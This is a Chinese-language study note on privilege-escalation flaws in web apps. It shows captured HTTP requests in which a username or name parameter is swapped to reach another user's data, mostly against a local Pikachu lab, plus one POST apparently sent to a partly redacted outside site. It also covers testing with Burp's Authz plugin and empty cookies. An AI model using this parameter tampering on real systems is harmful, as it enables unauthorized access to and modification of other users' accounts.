#知识点：

1、水平越权-同级用户权限共享

2、垂直越权-低高用户权限共享

3、访问控制-验证丢失&取消验证&脆弱验证

4、脆弱验证-Cookie&Token&Jwt等

解释

水平越权

就是同级用户之间的越权，打个比方现在有ABC三个用户，A是管理员，BC都是普通用户，现在B能够使用C这个用户的权限这就是水平越权，

垂直越权

他这个就是不一样拉，他这个就是通过低级权限跨越到高级权限，用高级权限干高级权限的事情，来我们继续打比方，A是超级管理员,BC是普通用户，现在这个B啊，通过了某些手段，跨越获得了A超级管理员的权限，这就是垂直越权，垂直越权的特点就是以低级权限向高级权限跨越

访问控制

验证丢失

未包含引用验证代码文件等

取消验证

支持空口令,匿名,白名单等

脆弱验证

Cookie&Token&Jwt 不安全的验证逻辑等

详解

越权的话

我口述一下啊

就是当我要改admin1这个用户的密码为123456的时候

我抓取更改的数据包，我把admin1 改成admin 如果admin 密码改成看123456 就存在越权漏洞了

数据包分析-大概了解

GET /xscj/pikachu-master/vul/overpermission/op1/op1_mem.php?username=admin1&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://127.0.0.1/xscj/pikachu-master/vul/overpermission/op1/op1_mem.php
Cookie: PHPSESSID=69b4947564935a6f50ced0d97e3c5a32
Connection: close

发现urlh后面有个username参数，参数值对应的是用户名，我们尝试下别的用户名

username=admin

GET /xscj/pikachu-master/vul/overpermission/op1/op1_mem.php?username=admin&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://127.0.0.1/xscj/pikachu-master/vul/overpermission/op1/op1_mem.php
Cookie: PHPSESSID=69b4947564935a6f50ced0d97e3c5a32
Connection: close

漏洞浮现

POST /ww/x.php HTTP/1.1
Host: .dwei.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://cs.odwei.com
DNT: 1
Connection: close
Referer: http://.dwei.com/ww/x.php
Upgrade-Insecure-Requests: 1title=&titl=&titla=%E6%9D%8E%E5%9B%9B&titlb=%E8%8B%A6%E8%8B%A6&titld=&titlf=&titlg=&titlh=

%E6%9D%8E%E5%9B%9B&titlb ==李四
%E8%8B%A6%E8%8B%A6== 苦苦

我们现在要改的是把李四的名字改成苦苦

我们现在越权把李四改成 麻子【麻子是存在的用户】

那么这样就会越权把麻子改成苦苦

漏洞工具

Authz

这个工具他是burp中的一个工具

他是一个半自动挖掘越权漏洞的工具

安装过程

复现一下下

首先啊这个复现的话需要两个账户一个是A一个是B

就是通过A越权到B

数据包已经抓取到了

那么现在就需要将两个账户都退出登录

然后呢我们把数据包

发送到Authz

cookie为空

然后全选Run

首先绿色代表正常访问

在没有cookie的情况下一样可以访问成功

这种就可能存在漏洞了